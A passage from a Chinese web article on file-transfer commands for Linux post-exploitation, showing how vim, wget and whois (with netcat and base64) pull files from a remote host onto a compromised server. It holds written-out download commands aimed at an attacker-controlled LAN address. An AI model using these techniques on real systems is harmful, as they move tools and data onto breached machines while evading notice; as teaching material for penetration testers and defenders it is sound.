第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by vim." > vim.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用vim下載文件

export URL=http://192.168.43.237:8080/vim.sent

export LFILE=vim.get

vim -c ':py import vim,sys; from os import environ as e

if sys.version_info.major == 3: import urllib.request as r

else: import urllib as r

r.urlretrieve(e["URL"], e["LFILE"])

vim.command(":q!")'

文件傳輸成功。

27、 wget

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并啟動(dòng)web服務(wù)

echo "get by wget." > wget.sent

python3 -m http.server 8080

第二步，Linux服務(wù)器使用wget下載文件

wget http://192.168.43.237:8080/wget.sent -O wget.get

文件傳輸成功。

28、 whois

使用下面的命令將文件從遠(yuǎn)程主機(jī)下載到Linux服務(wù)器本地：

第一步，遠(yuǎn)程主機(jī)創(chuàng)建測試文件并運(yùn)行netcat監(jiān)聽端口

echo "get by whois." > whois.sent

nc -l -p 12345 < whois.sent

第二步，Linux服務(wù)器使用whois下載文件

whois -h 192.168.43.237 -p 12345 '任意字符串' > whois.get

文件傳輸成功。

或者使用下面的方法：

第一步，遠(yuǎn)程主機(jī)運(yùn)行netcat監(jiān)聽端口

echo "get by whois again." > whois.sent

base64 "whois.sent" | nc -l -p 12345

第二步，Linux服務(wù)器使用whois下載文件

whois -h 192.168.43.237 -p 12345 "abc" | base64 -d > whois.get

"abc"為任意字符，必須輸入，不輸入則報(bào)錯(cuò)。

文件傳輸成功。

“Linux系統(tǒng)怎么在后滲透中的文件傳輸命令”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站，小編將為大家輸出更多高質(zhì)量的實(shí)用文章！

本文題目：Linux系統(tǒng)怎么在后滲透中的文件傳輸命令
文章分享：http://bm7419.com/article18/jjeegp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供企業(yè)建站、靜態(tài)網(wǎng)站、微信公眾號(hào)、網(wǎng)站改版、移動(dòng)網(wǎng)站建設(shè)、自適應(yīng)網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)